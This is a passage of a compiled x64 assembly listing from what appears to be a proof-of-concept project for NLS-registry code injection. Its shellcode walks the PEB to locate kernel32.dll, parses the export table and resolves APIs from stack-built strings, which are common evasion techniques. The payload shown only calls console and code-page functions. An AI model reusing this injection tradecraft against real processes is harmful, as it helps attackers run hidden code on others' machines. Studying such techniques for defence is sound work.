C:\Users\USER\source\repos\NLSRegistryCodeInjection\ShellcodeInjection\ShellcodeInjection.cpp 74 | ; Line 51 75 | $LN7: 76 | mov QWORD PTR [rsp+16], rdx 77 | mov QWORD PTR [rsp+8], rcx 78 | sub rsp, 56 ; 00000038H 79 | ; Line 52 80 | mov rax, QWORD PTR dwCodePageId$[rsp] 81 | mov eax, DWORD PTR [rax] 82 | mov DWORD PTR dwCodePageID$[rsp], eax 83 | ; Line 53 84 | mov rax, QWORD PTR iat$[rsp] 85 | call QWORD PTR [rax+8] 86 | test rax, rax 87 | jne SHORT $LN2@SpawnPaylo 88 | ; Line 55 89 | mov rax, QWORD PTR iat$[rsp] 90 | call QWORD PTR [rax+24] 91 | test eax, eax 92 | jne SHORT $LN3@SpawnPaylo 93 | ; Line 56 94 | jmp SHORT $LN1@SpawnPaylo 95 | $LN3@SpawnPaylo: 96 | $LN2@SpawnPaylo: 97 | ; Line 59 98 | mov ecx, DWORD PTR dwCodePageID$[rsp] 99 | mov rax, QWORD PTR iat$[rsp] 100 | call QWORD PTR [rax] 101 | test eax, eax 102 | jne SHORT $LN4@SpawnPaylo 103 | ; Line 60 104 | jmp SHORT $LN1@SpawnPaylo 105 | $LN4@SpawnPaylo: 106 | ; Line 62 107 | mov ecx, DWORD PTR dwCodePageID$[rsp] 108 | mov rax, QWORD PTR iat$[rsp] 109 | call QWORD PTR [rax+16] 110 | test eax, eax 111 | jne SHORT $LN5@SpawnPaylo 112 | ; Line 63 113 | jmp SHORT $LN1@SpawnPaylo 114 | $LN5@SpawnPaylo: 115 | ; Line 65 116 | xor ecx, ecx 117 | mov rax, QWORD PTR iat$[rsp] 118 | call QWORD PTR [rax+32] 119 | $LN1@SpawnPaylo: 120 | ; Line 66 121 | add rsp, 56 ; 00000038H 122 | ret 0 123 | ?SpawnPayload@@YAXPEAKAEAUkernel32Iat@@@Z ENDP ; SpawnPayload 124 | _TEXT ENDS 125 | ; Function compile flags: /Odtp 126 | _TEXT SEGMENT 127 | set_console_cp_name$ = 32 128 | alloc_console_name$ = 48 129 | get_proc_name$ = 64 130 | get_console_window_name$ = 80 131 | set_console_output_cp_name$ = 104 132 | set_Thread_UI_language_Name$ = 128 133 | baseAddrKernel32$ = 152 134 | kernel32_dll_name$ = 160 135 | get_proc$ = 192 136 | iat$ = 224 137 | ?initializeIatShellcode@@YAIAEAUkernel32Iat@@@Z PROC ; initializeIatShellcode 138 | ; File 
C:\Users\USER\source\repos\NLSRegistryCodeInjection\ShellcodeInjection\ShellcodeInjection.cpp 139 | ; Line 7 140 | $LN10: 141 | mov QWORD PTR [rsp+8], rcx 142 | sub rsp, 216 ; 000000d8H 143 | ; Line 8 144 | mov eax, 107 ; 0000006bH 145 | mov WORD PTR kernel32_dll_name$[rsp], ax 146 | mov eax, 101 ; 00000065H 147 | mov WORD PTR kernel32_dll_name$[rsp+2], ax 148 | mov eax, 114 ; 00000072H 149 | mov WORD PTR kernel32_dll_name$[rsp+4], ax 150 | mov eax, 110 ; 0000006eH 151 | mov WORD PTR kernel32_dll_name$[rsp+6], ax 152 | mov eax, 101 ; 00000065H 153 | mov WORD PTR kernel32_dll_name$[rsp+8], ax 154 | mov eax, 108 ; 0000006cH 155 | mov WORD PTR kernel32_dll_name$[rsp+10], ax 156 | mov eax, 51 ; 00000033H 157 | mov WORD PTR kernel32_dll_name$[rsp+12], ax 158 | mov eax, 50 ; 00000032H 159 | mov WORD PTR kernel32_dll_name$[rsp+14], ax 160 | mov eax, 46 ; 0000002eH 161 | mov WORD PTR kernel32_dll_name$[rsp+16], ax 162 | mov eax, 100 ; 00000064H 163 | mov WORD PTR kernel32_dll_name$[rsp+18], ax 164 | mov eax, 108 ; 0000006cH 165 | mov WORD PTR kernel32_dll_name$[rsp+20], ax 166 | mov eax, 108 ; 0000006cH 167 | mov WORD PTR kernel32_dll_name$[rsp+22], ax 168 | xor eax, eax 169 | mov WORD PTR kernel32_dll_name$[rsp+24], ax 170 | ; Line 9 171 | lea rcx, QWORD PTR kernel32_dll_name$[rsp] 172 | call ?GetModuleByName@@YAPEAXPEA_W@Z ; GetModuleByName 173 | mov QWORD PTR baseAddrKernel32$[rsp], rax 174 | ; Line 10 175 | cmp QWORD PTR baseAddrKernel32$[rsp], 0 176 | jne SHORT $LN2@initialize 177 | ; Line 11 178 | mov eax, 1 179 | jmp $LN1@initialize 180 | $LN2@initialize: 181 | ; Line 13 182 | mov BYTE PTR get_proc_name$[rsp], 71 ; 00000047H 183 | mov BYTE PTR get_proc_name$[rsp+1], 101 ; 00000065H 184 | mov BYTE PTR get_proc_name$[rsp+2], 116 ; 00000074H 185 | mov BYTE PTR get_proc_name$[rsp+3], 80 ; 00000050H 186 | mov BYTE PTR get_proc_name$[rsp+4], 114 ; 00000072H 187 | mov BYTE PTR get_proc_name$[rsp+5], 111 ; 0000006fH 188 | mov BYTE PTR get_proc_name$[rsp+6], 99 ; 00000063H 
189 | mov BYTE PTR get_proc_name$[rsp+7], 65 ; 00000041H 190 | mov BYTE PTR get_proc_name$[rsp+8], 100 ; 00000064H 191 | mov BYTE PTR get_proc_name$[rsp+9], 100 ; 00000064H 192 | mov BYTE PTR get_proc_name$[rsp+10], 114 ; 00000072H 193 | mov BYTE PTR get_proc_name$[rsp+11], 101 ; 00000065H 194 | mov BYTE PTR get_proc_name$[rsp+12], 115 ; 00000073H 195 | mov BYTE PTR get_proc_name$[rsp+13], 115 ; 00000073H 196 | mov BYTE PTR get_proc_name$[rsp+14], 0 197 | ; Line 14 198 | lea rdx, QWORD PTR get_proc_name$[rsp] 199 | mov rcx, QWORD PTR baseAddrKernel32$[rsp] 200 | call ?GetFunctionByName@@YAPEAXPEAXPEAD@Z ; GetFunctionByName 201 | mov QWORD PTR get_proc$[rsp], rax 202 | ; Line 15 203 | cmp QWORD PTR get_proc$[rsp], 0 204 | jne SHORT $LN3@initialize 205 | ; Line 16 206 | mov eax, 3 207 | jmp $LN1@initialize 208 | $LN3@initialize: 209 | ; Line 18 210 | mov rax, QWORD PTR iat$[rsp] 211 | mov rcx, QWORD PTR get_proc$[rsp] 212 | mov QWORD PTR [rax+40], rcx 213 | ; Line 20 214 | mov BYTE PTR get_console_window_name$[rsp], 71 ; 00000047H 215 | mov BYTE PTR get_console_window_name$[rsp+1], 101 ; 00000065H 216 | mov BYTE PTR get_console_window_name$[rsp+2], 116 ; 00000074H 217 | mov BYTE PTR get_console_window_name$[rsp+3], 67 ; 00000043H 218 | mov BYTE PTR get_console_window_name$[rsp+4], 111 ; 0000006fH 219 | mov BYTE PTR get_console_window_name$[rsp+5], 110 ; 0000006eH 220 | mov BYTE PTR get_console_window_name$[rsp+6], 115 ; 00000073H 221 | mov BYTE PTR get_console_window_name$[rsp+7], 111 ; 0000006fH 222 | mov BYTE PTR get_console_window_name$[rsp+8], 108 ; 0000006cH 223 | mov BYTE PTR get_console_window_name$[rsp+9], 101 ; 00000065H 224 | mov BYTE PTR get_console_window_name$[rsp+10], 87 ; 00000057H 225 | mov BYTE PTR get_console_window_name$[rsp+11], 105 ; 00000069H 226 | mov BYTE PTR get_console_window_name$[rsp+12], 110 ; 0000006eH 227 | mov BYTE PTR get_console_window_name$[rsp+13], 100 ; 00000064H 228 | mov BYTE PTR get_console_window_name$[rsp+14], 111 ; 0000006fH 
229 | mov BYTE PTR get_console_window_name$[rsp+15], 119 ; 00000077H 230 | mov BYTE PTR get_console_window_name$[rsp+16], 0 231 | ; Line 21 232 | mov BYTE PTR alloc_console_name$[rsp], 65 ; 00000041H 233 | mov BYTE PTR alloc_console_name$[rsp+1], 108 ; 0000006cH 234 | mov BYTE PTR alloc_console_name$[rsp+2], 108 ; 0000006cH 235 | mov BYTE PTR alloc_console_name$[rsp+3], 111 ; 0000006fH 236 | mov BYTE PTR alloc_console_name$[rsp+4], 99 ; 00000063H 237 | mov BYTE PTR alloc_console_name$[rsp+5], 67 ; 00000043H 238 | mov BYTE PTR alloc_console_name$[rsp+6], 111 ; 0000006fH 239 | mov BYTE PTR alloc_console_name$[rsp+7], 110 ; 0000006eH 240 | mov BYTE PTR alloc_console_name$[rsp+8], 115 ; 00000073H 241 | mov BYTE PTR alloc_console_name$[rsp+9], 111 ; 0000006fH 242 | mov BYTE PTR alloc_console_name$[rsp+10], 108 ; 0000006cH 243 | mov BYTE PTR alloc_console_name$[rsp+11], 101 ; 00000065H 244 | mov BYTE PTR alloc_console_name$[rsp+12], 0 245 | ; Line 22 246 | mov BYTE PTR set_console_cp_name$[rsp], 83 ; 00000053H 247 | mov BYTE PTR set_console_cp_name$[rsp+1], 101 ; 00000065H 248 | mov BYTE PTR set_console_cp_name$[rsp+2], 116 ; 00000074H 249 | mov BYTE PTR set_console_cp_name$[rsp+3], 67 ; 00000043H 250 | mov BYTE PTR set_console_cp_name$[rsp+4], 111 ; 0000006fH 251 | mov BYTE PTR set_console_cp_name$[rsp+5], 110 ; 0000006eH 252 | mov BYTE PTR set_console_cp_name$[rsp+6], 115 ; 00000073H 253 | mov BYTE PTR set_console_cp_name$[rsp+7], 111 ; 0000006fH 254 | mov BYTE PTR set_console_cp_name$[rsp+8], 108 ; 0000006cH 255 | mov BYTE PTR set_console_cp_name$[rsp+9], 101 ; 00000065H 256 | mov BYTE PTR set_console_cp_name$[rsp+10], 67 ; 00000043H 257 | mov BYTE PTR set_console_cp_name$[rsp+11], 80 ; 00000050H 258 | mov BYTE PTR set_console_cp_name$[rsp+12], 0 259 | ; Line 23 260 | mov BYTE PTR set_console_output_cp_name$[rsp], 83 ; 00000053H 261 | mov BYTE PTR set_console_output_cp_name$[rsp+1], 101 ; 00000065H 262 | mov BYTE PTR set_console_output_cp_name$[rsp+2], 116 ; 00000074H 
263 | mov BYTE PTR set_console_output_cp_name$[rsp+3], 67 ; 00000043H 264 | mov BYTE PTR set_console_output_cp_name$[rsp+4], 111 ; 0000006fH 265 | mov BYTE PTR set_console_output_cp_name$[rsp+5], 110 ; 0000006eH 266 | mov BYTE PTR set_console_output_cp_name$[rsp+6], 115 ; 00000073H 267 | mov BYTE PTR set_console_output_cp_name$[rsp+7], 111 ; 0000006fH 268 | mov BYTE PTR set_console_output_cp_name$[rsp+8], 108 ; 0000006cH 269 | mov BYTE PTR set_console_output_cp_name$[rsp+9], 101 ; 00000065H 270 | mov BYTE PTR set_console_output_cp_name$[rsp+10], 79 ; 0000004fH 271 | mov BYTE PTR set_console_output_cp_name$[rsp+11], 117 ; 00000075H 272 | mov BYTE PTR set_console_output_cp_name$[rsp+12], 116 ; 00000074H 273 | mov BYTE PTR set_console_output_cp_name$[rsp+13], 112 ; 00000070H 274 | mov BYTE PTR set_console_output_cp_name$[rsp+14], 117 ; 00000075H 275 | mov BYTE PTR set_console_output_cp_name$[rsp+15], 116 ; 00000074H 276 | mov BYTE PTR set_console_output_cp_name$[rsp+16], 67 ; 00000043H 277 | mov BYTE PTR set_console_output_cp_name$[rsp+17], 80 ; 00000050H 278 | mov BYTE PTR set_console_output_cp_name$[rsp+18], 0 279 | ; Line 24 280 | mov BYTE PTR set_Thread_UI_language_Name$[rsp], 83 ; 00000053H 281 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+1], 101 ; 00000065H 282 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+2], 116 ; 00000074H 283 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+3], 84 ; 00000054H 284 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+4], 104 ; 00000068H 285 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+5], 114 ; 00000072H 286 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+6], 101 ; 00000065H 287 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+7], 97 ; 00000061H 288 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+8], 100 ; 00000064H 289 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+9], 85 ; 00000055H 290 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+10], 73 ; 00000049H 291 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+11], 76 ; 
0000004cH 292 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+12], 97 ; 00000061H 293 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+13], 110 ; 0000006eH 294 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+14], 103 ; 00000067H 295 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+15], 117 ; 00000075H 296 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+16], 97 ; 00000061H 297 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+17], 103 ; 00000067H 298 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+18], 101 ; 00000065H 299 | mov BYTE PTR set_Thread_UI_language_Name$[rsp+19], 0 300 | ; Line 26 301 | lea rdx, QWORD PTR set_console_output_cp_name$[rsp] 302 | mov rcx, QWORD PTR baseAddrKernel32$[rsp] 303 | mov rax, QWORD PTR iat$[rsp] 304 | call QWORD PTR [rax+40] 305 | mov rcx, QWORD PTR iat$[rsp] 306 | mov QWORD PTR [rcx], rax 307 | ; Line 27 308 | mov rax, QWORD PTR iat$[rsp] 309 | cmp QWORD PTR [rax], 0 310 | jne SHORT $LN4@initialize 311 | ; Line 28 312 | mov eax, 4 313 | jmp $LN1@initialize 314 | $LN4@initialize: 315 | ; Line 30 316 | lea rdx, QWORD PTR get_console_window_name$[rsp] 317 | mov rcx, QWORD PTR baseAddrKernel32$[rsp] 318 | mov rax, QWORD PTR iat$[rsp] 319 | call QWORD PTR [rax+40] 320 | mov rcx, QWORD PTR iat$[rsp] 321 | mov QWORD PTR [rcx+8], rax 322 | ; Line 31 323 | mov rax, QWORD PTR iat$[rsp] 324 | cmp QWORD PTR [rax+8], 0 325 | jne SHORT $LN5@initialize 326 | ; Line 32 327 | mov eax, 5 328 | jmp $LN1@initialize 329 | $LN5@initialize: 330 | ; Line 34 331 | lea rdx, QWORD PTR set_console_cp_name$[rsp] 332 | mov rcx, QWORD PTR baseAddrKernel32$[rsp] 333 | mov rax, QWORD PTR iat$[rsp] 334 | call QWORD PTR [rax+40] 335 | mov rcx, QWORD PTR iat$[rsp] 336 | mov QWORD PTR [rcx+16], rax 337 | ; Line 35 338 | mov rax, QWORD PTR iat$[rsp] 339 | cmp QWORD PTR [rax+16], 0 340 | jne SHORT $LN6@initialize 341 | ; Line 36 342 | mov eax, 6 343 | jmp SHORT $LN1@initialize 344 | $LN6@initialize: 345 | ; Line 38 346 | lea rdx, QWORD PTR alloc_console_name$[rsp] 347 | 
mov rcx, QWORD PTR baseAddrKernel32$[rsp] 348 | mov rax, QWORD PTR iat$[rsp] 349 | call QWORD PTR [rax+40] 350 | mov rcx, QWORD PTR iat$[rsp] 351 | mov QWORD PTR [rcx+24], rax 352 | ; Line 39 353 | mov rax, QWORD PTR iat$[rsp] 354 | cmp QWORD PTR [rax+24], 0 355 | jne SHORT $LN7@initialize 356 | ; Line 40 357 | mov eax, 7 358 | jmp SHORT $LN1@initialize 359 | $LN7@initialize: 360 | ; Line 42 361 | lea rdx, QWORD PTR set_Thread_UI_language_Name$[rsp] 362 | mov rcx, QWORD PTR baseAddrKernel32$[rsp] 363 | mov rax, QWORD PTR iat$[rsp] 364 | call QWORD PTR [rax+40] 365 | mov rcx, QWORD PTR iat$[rsp] 366 | mov QWORD PTR [rcx+32], rax 367 | ; Line 43 368 | mov rax, QWORD PTR iat$[rsp] 369 | cmp QWORD PTR [rax+32], 0 370 | jne SHORT $LN8@initialize 371 | ; Line 44 372 | mov eax, 8 373 | jmp SHORT $LN1@initialize 374 | $LN8@initialize: 375 | ; Line 46 376 | xor eax, eax 377 | $LN1@initialize: 378 | ; Line 47 379 | add rsp, 216 ; 000000d8H 380 | ret 0 381 | ?initializeIatShellcode@@YAIAEAUkernel32Iat@@@Z ENDP ; initializeIatShellcode 382 | _TEXT ENDS 383 | ; Function compile flags: /Odtp 384 | ; COMDAT ?GetFunctionByName@@YAPEAXPEAXPEAD@Z 385 | _TEXT SEGMENT 386 | k$1 = 0 387 | i$2 = 8 388 | exp$ = 16 389 | expAddr$ = 24 390 | funcNamesListRVA$ = 28 391 | namesOrdsListRVA$ = 32 392 | funcsListRVA$ = 36 393 | curr_name$3 = 40 394 | idh$ = 48 395 | exportsDir$ = 56 396 | nt_headers$ = 64 397 | namesCount$ = 72 398 | nameIndex$4 = 80 399 | nameRVA$5 = 88 400 | funcRVA$6 = 96 401 | module$ = 128 402 | func_name$ = 136 403 | ?GetFunctionByName@@YAPEAXPEAXPEAD@Z PROC ; GetFunctionByName, COMDAT 404 | ; File C:\Users\USER\source\repos\NLSRegistryCodeInjection\ShellcodeInjection\defs.h 405 | ; Line 68 406 | $LN13: 407 | mov QWORD PTR [rsp+16], rdx 408 | mov QWORD PTR [rsp+8], rcx 409 | sub rsp, 120 ; 00000078H 410 | ; Line 69 411 | mov rax, QWORD PTR module$[rsp] 412 | mov QWORD PTR idh$[rsp], rax 413 | ; Line 70 414 | mov rax, QWORD PTR idh$[rsp] 415 | movzx eax, WORD PTR [rax] 416 
| cmp eax, 23117 ; 00005a4dH 417 | je SHORT $LN8@GetFunctio 418 | ; Line 71 419 | xor eax, eax 420 | jmp $LN1@GetFunctio 421 | $LN8@GetFunctio: 422 | ; Line 73 423 | mov rax, QWORD PTR idh$[rsp] 424 | movsxd rax, DWORD PTR [rax+60] 425 | mov rcx, QWORD PTR module$[rsp] 426 | add rcx, rax 427 | mov rax, rcx 428 | mov QWORD PTR nt_headers$[rsp], rax 429 | ; Line 74 430 | mov eax, 8 431 | imul rax, rax, 0 432 | mov rcx, QWORD PTR nt_headers$[rsp] 433 | lea rax, QWORD PTR [rcx+rax+136] 434 | mov QWORD PTR exportsDir$[rsp], rax 435 | ; Line 75 436 | mov rax, QWORD PTR exportsDir$[rsp] 437 | cmp DWORD PTR [rax], 0 438 | jne SHORT $LN9@GetFunctio 439 | ; Line 76 440 | xor eax, eax 441 | jmp $LN1@GetFunctio 442 | $LN9@GetFunctio: 443 | ; Line 79 444 | mov rax, QWORD PTR exportsDir$[rsp] 445 | mov eax, DWORD PTR [rax] 446 | mov DWORD PTR expAddr$[rsp], eax 447 | ; Line 80 448 | mov eax, DWORD PTR expAddr$[rsp] 449 | add rax, QWORD PTR module$[rsp] 450 | mov QWORD PTR exp$[rsp], rax 451 | ; Line 81 452 | mov rax, QWORD PTR exp$[rsp] 453 | mov eax, DWORD PTR [rax+24] 454 | mov QWORD PTR namesCount$[rsp], rax 455 | ; Line 83 456 | mov rax, QWORD PTR exp$[rsp] 457 | mov eax, DWORD PTR [rax+28] 458 | mov DWORD PTR funcsListRVA$[rsp], eax 459 | ; Line 84 460 | mov rax, QWORD PTR exp$[rsp] 461 | mov eax, DWORD PTR [rax+32] 462 | mov DWORD PTR funcNamesListRVA$[rsp], eax 463 | ; Line 85 464 | mov rax, QWORD PTR exp$[rsp] 465 | mov eax, DWORD PTR [rax+36] 466 | mov DWORD PTR namesOrdsListRVA$[rsp], eax 467 | ; Line 88 468 | mov QWORD PTR i$2[rsp], 0 469 | jmp SHORT $LN4@GetFunctio 470 | $LN2@GetFunctio: 471 | mov rax, QWORD PTR i$2[rsp] 472 | inc rax 473 | mov QWORD PTR i$2[rsp], rax 474 | $LN4@GetFunctio: 475 | mov rax, QWORD PTR namesCount$[rsp] 476 | cmp QWORD PTR i$2[rsp], rax 477 | jae $LN3@GetFunctio 478 | ; Line 89 479 | mov eax, DWORD PTR funcNamesListRVA$[rsp] 480 | mov rcx, QWORD PTR module$[rsp] 481 | add rcx, rax 482 | mov rax, rcx 483 | mov rcx, QWORD PTR i$2[rsp] 484 | 
lea rax, QWORD PTR [rax+rcx*4] 485 | mov QWORD PTR nameRVA$5[rsp], rax 486 | ; Line 90 487 | mov eax, DWORD PTR namesOrdsListRVA$[rsp] 488 | mov rcx, QWORD PTR module$[rsp] 489 | add rcx, rax 490 | mov rax, rcx 491 | mov rcx, QWORD PTR i$2[rsp] 492 | lea rax, QWORD PTR [rax+rcx*2] 493 | mov QWORD PTR nameIndex$4[rsp], rax 494 | ; Line 91 495 | mov eax, DWORD PTR funcsListRVA$[rsp] 496 | mov rcx, QWORD PTR module$[rsp] 497 | add rcx, rax 498 | mov rax, rcx 499 | mov rcx, QWORD PTR nameIndex$4[rsp] 500 | movzx ecx, WORD PTR [rcx] 501 | lea rax, QWORD PTR [rax+rcx*4] 502 | mov QWORD PTR funcRVA$6[rsp], rax 503 | ; Line 93 504 | mov rax, QWORD PTR nameRVA$5[rsp] 505 | mov eax, DWORD PTR [rax] 506 | mov rcx, QWORD PTR module$[rsp] 507 | add rcx, rax 508 | mov rax, rcx 509 | mov QWORD PTR curr_name$3[rsp], rax 510 | ; Line 95 511 | mov QWORD PTR k$1[rsp], 0 512 | jmp SHORT $LN7@GetFunctio 513 | $LN5@GetFunctio: 514 | mov rax, QWORD PTR k$1[rsp] 515 | inc rax 516 | mov QWORD PTR k$1[rsp], rax 517 | $LN7@GetFunctio: 518 | mov rax, QWORD PTR k$1[rsp] 519 | mov rcx, QWORD PTR func_name$[rsp] 520 | add rcx, rax 521 | mov rax, rcx 522 | movsx eax, BYTE PTR [rax] 523 | test eax, eax 524 | je SHORT $LN6@GetFunctio 525 | mov rax, QWORD PTR k$1[rsp] 526 | mov rcx, QWORD PTR curr_name$3[rsp] 527 | add rcx, rax 528 | mov rax, rcx 529 | movsx eax, BYTE PTR [rax] 530 | test eax, eax 531 | je SHORT $LN6@GetFunctio 532 | ; Line 96 533 | mov rax, QWORD PTR k$1[rsp] 534 | mov rcx, QWORD PTR func_name$[rsp] 535 | add rcx, rax 536 | mov rax, rcx 537 | movsx eax, BYTE PTR [rax] 538 | mov rcx, QWORD PTR k$1[rsp] 539 | mov rdx, QWORD PTR curr_name$3[rsp] 540 | add rdx, rcx 541 | mov rcx, rdx 542 | movsx ecx, BYTE PTR [rcx] 543 | cmp eax, ecx 544 | je SHORT $LN10@GetFunctio 545 | jmp SHORT $LN6@GetFunctio 546 | $LN10@GetFunctio: 547 | ; Line 97 548 | jmp SHORT $LN5@GetFunctio 549 | $LN6@GetFunctio: 550 | ; Line 98 551 | mov rax, QWORD PTR k$1[rsp] 552 | mov rcx, QWORD PTR func_name$[rsp] 553 | 
add rcx, rax 554 | mov rax, rcx 555 | movsx eax, BYTE PTR [rax] 556 | test eax, eax 557 | jne SHORT $LN11@GetFunctio 558 | mov rax, QWORD PTR k$1[rsp] 559 | mov rcx, QWORD PTR curr_name$3[rsp] 560 | add rcx, rax 561 | mov rax, rcx 562 | movsx eax, BYTE PTR [rax] 563 | test eax, eax 564 | jne SHORT $LN11@GetFunctio 565 | ; Line 100 566 | mov rax, QWORD PTR funcRVA$6[rsp] 567 | mov eax, DWORD PTR [rax] 568 | mov rcx, QWORD PTR module$[rsp] 569 | add rcx, rax 570 | mov rax, rcx 571 | jmp SHORT $LN1@GetFunctio 572 | $LN11@GetFunctio: 573 | ; Line 102 574 | jmp $LN2@GetFunctio 575 | $LN3@GetFunctio: 576 | ; Line 103 577 | xor eax, eax 578 | $LN1@GetFunctio: 579 | ; Line 104 580 | add rsp, 120 ; 00000078H 581 | ret 0 582 | ?GetFunctionByName@@YAPEAXPEAXPEAD@Z ENDP ; GetFunctionByName 583 | _TEXT ENDS 584 | ; Function compile flags: /Odtp 585 | ; COMDAT ?GetModuleByName@@YAPEAXPEA_W@Z 586 | _TEXT SEGMENT 587 | i$1 = 0 588 | tv141 = 8 589 | tv160 = 10 590 | curr_name$2 = 16 591 | c1$3 = 24 592 | c2$4 = 28 593 | tv137 = 32 594 | tv156 = 36 595 | entry$5 = 40 596 | current$6 = 48 597 | head$ = 56 598 | peb$ = 64 599 | ldr$ = 72 600 | module_name$ = 96 601 | ?GetModuleByName@@YAPEAXPEA_W@Z PROC ; GetModuleByName, COMDAT 602 | ; File C:\Users\USER\source\repos\NLSRegistryCodeInjection\ShellcodeInjection\defs.h 603 | ; Line 30 604 | $LN20: 605 | mov QWORD PTR [rsp+8], rcx 606 | sub rsp, 88 ; 00000058H 607 | ; Line 33 608 | mov rax, QWORD PTR gs:[96] 609 | mov QWORD PTR peb$[rsp], rax 610 | ; Line 37 611 | mov rax, QWORD PTR peb$[rsp] 612 | mov rax, QWORD PTR [rax+24] 613 | mov QWORD PTR ldr$[rsp], rax 614 | ; Line 39 615 | mov rax, QWORD PTR ldr$[rsp] 616 | add rax, 32 ; 00000020H 617 | mov QWORD PTR head$[rsp], rax 618 | ; Line 40 619 | mov rax, QWORD PTR head$[rsp] 620 | mov rax, QWORD PTR [rax] 621 | mov QWORD PTR current$6[rsp], rax 622 | jmp SHORT $LN4@GetModuleB 623 | $LN2@GetModuleB: 624 | mov rax, QWORD PTR current$6[rsp] 625 | mov rax, QWORD PTR [rax] 626 | mov QWORD 
PTR current$6[rsp], rax 627 | $LN4@GetModuleB: 628 | mov rax, QWORD PTR head$[rsp] 629 | cmp QWORD PTR current$6[rsp], rax 630 | je $LN3@GetModuleB 631 | ; Line 41 632 | mov rax, QWORD PTR current$6[rsp] 633 | sub rax, 16 634 | mov QWORD PTR entry$5[rsp], rax 635 | ; Line 42 636 | cmp QWORD PTR entry$5[rsp], 0 637 | je SHORT $LN9@GetModuleB 638 | mov rax, QWORD PTR entry$5[rsp] 639 | cmp QWORD PTR [rax+48], 0 640 | jne SHORT $LN8@GetModuleB 641 | $LN9@GetModuleB: 642 | jmp $LN3@GetModuleB 643 | $LN8@GetModuleB: 644 | ; Line 44 645 | mov rax, QWORD PTR entry$5[rsp] 646 | mov rax, QWORD PTR [rax+96] 647 | mov QWORD PTR curr_name$2[rsp], rax 648 | ; Line 45 649 | cmp QWORD PTR curr_name$2[rsp], 0 650 | jne SHORT $LN10@GetModuleB 651 | jmp SHORT $LN2@GetModuleB 652 | $LN10@GetModuleB: 653 | ; Line 48 654 | mov QWORD PTR i$1[rsp], 0 655 | jmp SHORT $LN7@GetModuleB 656 | $LN5@GetModuleB: 657 | mov rax, QWORD PTR i$1[rsp] 658 | inc rax 659 | mov QWORD PTR i$1[rsp], rax 660 | $LN7@GetModuleB: 661 | mov rax, QWORD PTR entry$5[rsp] 662 | movzx eax, WORD PTR [rax+88] 663 | cmp QWORD PTR i$1[rsp], rax 664 | jae $LN6@GetModuleB 665 | ; Line 50 666 | mov rax, QWORD PTR module_name$[rsp] 667 | mov rcx, QWORD PTR i$1[rsp] 668 | movzx eax, WORD PTR [rax+rcx*2] 669 | test eax, eax 670 | je SHORT $LN12@GetModuleB 671 | mov rax, QWORD PTR curr_name$2[rsp] 672 | mov rcx, QWORD PTR i$1[rsp] 673 | movzx eax, WORD PTR [rax+rcx*2] 674 | test eax, eax 675 | jne SHORT $LN11@GetModuleB 676 | $LN12@GetModuleB: 677 | ; Line 51 678 | jmp $LN6@GetModuleB 679 | $LN11@GetModuleB: 680 | ; Line 54 681 | mov rax, QWORD PTR module_name$[rsp] 682 | mov rcx, QWORD PTR i$1[rsp] 683 | movzx eax, WORD PTR [rax+rcx*2] 684 | cmp eax, 90 ; 0000005aH 685 | jg SHORT $LN16@GetModuleB 686 | mov rax, QWORD PTR module_name$[rsp] 687 | mov rcx, QWORD PTR i$1[rsp] 688 | movzx eax, WORD PTR [rax+rcx*2] 689 | cmp eax, 65 ; 00000041H 690 | jl SHORT $LN16@GetModuleB 691 | mov rax, QWORD PTR module_name$[rsp] 692 | mov 
rcx, QWORD PTR i$1[rsp] 693 | movzx eax, WORD PTR [rax+rcx*2] 694 | sub eax, 65 ; 00000041H 695 | add eax, 97 ; 00000061H 696 | mov DWORD PTR tv137[rsp], eax 697 | mov rax, QWORD PTR module_name$[rsp] 698 | mov rcx, QWORD PTR i$1[rsp] 699 | movzx edx, WORD PTR tv137[rsp] 700 | mov WORD PTR [rax+rcx*2], dx 701 | movzx eax, WORD PTR tv137[rsp] 702 | mov WORD PTR tv141[rsp], ax 703 | jmp SHORT $LN17@GetModuleB 704 | $LN16@GetModuleB: 705 | mov rax, QWORD PTR module_name$[rsp] 706 | mov rcx, QWORD PTR i$1[rsp] 707 | movzx eax, WORD PTR [rax+rcx*2] 708 | mov WORD PTR tv141[rsp], ax 709 | $LN17@GetModuleB: 710 | movzx eax, WORD PTR tv141[rsp] 711 | mov WORD PTR c1$3[rsp], ax 712 | ; Line 55 713 | mov rax, QWORD PTR curr_name$2[rsp] 714 | mov rcx, QWORD PTR i$1[rsp] 715 | movzx eax, WORD PTR [rax+rcx*2] 716 | cmp eax, 90 ; 0000005aH 717 | jg SHORT $LN18@GetModuleB 718 | mov rax, QWORD PTR curr_name$2[rsp] 719 | mov rcx, QWORD PTR i$1[rsp] 720 | movzx eax, WORD PTR [rax+rcx*2] 721 | cmp eax, 65 ; 00000041H 722 | jl SHORT $LN18@GetModuleB 723 | mov rax, QWORD PTR curr_name$2[rsp] 724 | mov rcx, QWORD PTR i$1[rsp] 725 | movzx eax, WORD PTR [rax+rcx*2] 726 | sub eax, 65 ; 00000041H 727 | add eax, 97 ; 00000061H 728 | mov DWORD PTR tv156[rsp], eax 729 | mov rax, QWORD PTR curr_name$2[rsp] 730 | mov rcx, QWORD PTR i$1[rsp] 731 | movzx edx, WORD PTR tv156[rsp] 732 | mov WORD PTR [rax+rcx*2], dx 733 | movzx eax, WORD PTR tv156[rsp] 734 | mov WORD PTR tv160[rsp], ax 735 | jmp SHORT $LN19@GetModuleB 736 | $LN18@GetModuleB: 737 | mov rax, QWORD PTR curr_name$2[rsp] 738 | mov rcx, QWORD PTR i$1[rsp] 739 | movzx eax, WORD PTR [rax+rcx*2] 740 | mov WORD PTR tv160[rsp], ax 741 | $LN19@GetModuleB: 742 | movzx eax, WORD PTR tv160[rsp] 743 